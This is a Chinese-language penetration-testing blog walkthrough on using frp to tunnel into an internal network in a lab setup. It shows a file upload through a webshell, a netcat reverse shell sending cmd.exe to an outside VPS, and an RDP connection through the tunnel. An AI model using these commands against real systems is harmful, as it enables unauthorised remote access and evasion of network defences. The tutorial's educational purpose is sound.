跳到主要內容
Frp 內網穿透
Frp 內網穿透
作者 : Noth
前言 :
滲透中很多內網穿透的方式,像 reGeorg、ngrok 等等之類的工具來進行內網穿透, 這次要介紹的是利用 frp 來進行 !
實作環境 :
攻擊者 : 212.32.230.27 (VPS1,外網)
攻擊者 : 192.168.137.129 (windows 10,內網)
攻擊者 : 51.79.158.250 (VPS2,外網)
受害者 : 192.168.137.128 (windows 2008,內網)
內文 :
在 VPS1 下載 frp 服務端 :
wget https://github.com/fatedier/frp/releases/download/v0.37.0/frp_0.37.0_linux_arm64.tar.gz
解壓縮 :
tar zxvf frp_0.37.0_linux_amd64.tar.gz
進入到 frp_0.37.0_linux_amd64 目錄,修改 frps.ini :
修改為 1234,等等拿來監聽 :
開啟 frps 服務端 :
./frps -c frps.ini
Windows 10 根據版本下載 frp 客戶端 :
透過蟻劍將 frpc.exe、frpc.ini 上傳到受害者 C:/Windows/Temp 目錄 :
修改 frpc.ini 配置 :
將受害者反彈 shell 到 VPS2,開始監聽 :
nc64.exe -lvvp 1056
nc64.exe 51.79.158.250 1056 -e cmd.exe
成功反彈 shell :
VPS2 執行 frpc :
frpc.exe -c frpc.ini
成功建立一個 tunnel :
服務端(VPS1)
客戶端(受害者)
Windows 10 進行 RDP 連接 :
mstsc -> 212.32.230.27:3389
成功連接 :
筆者始終認為使用工具是必須的,但思路要清晰 xD 不可以只拘泥於一種方式,而是腦袋要靈活應用,每個滲透場景都截然不同 ! 滲透越打越深就會發現越來越吃基本功(系統、網路、程式),只能說遇到不懂就會發現自己所缺乏的知識點,再回去補足就好 ! 真希望未來某一天能和一群大佬一起工作啊 !! ~
留言
張貼留言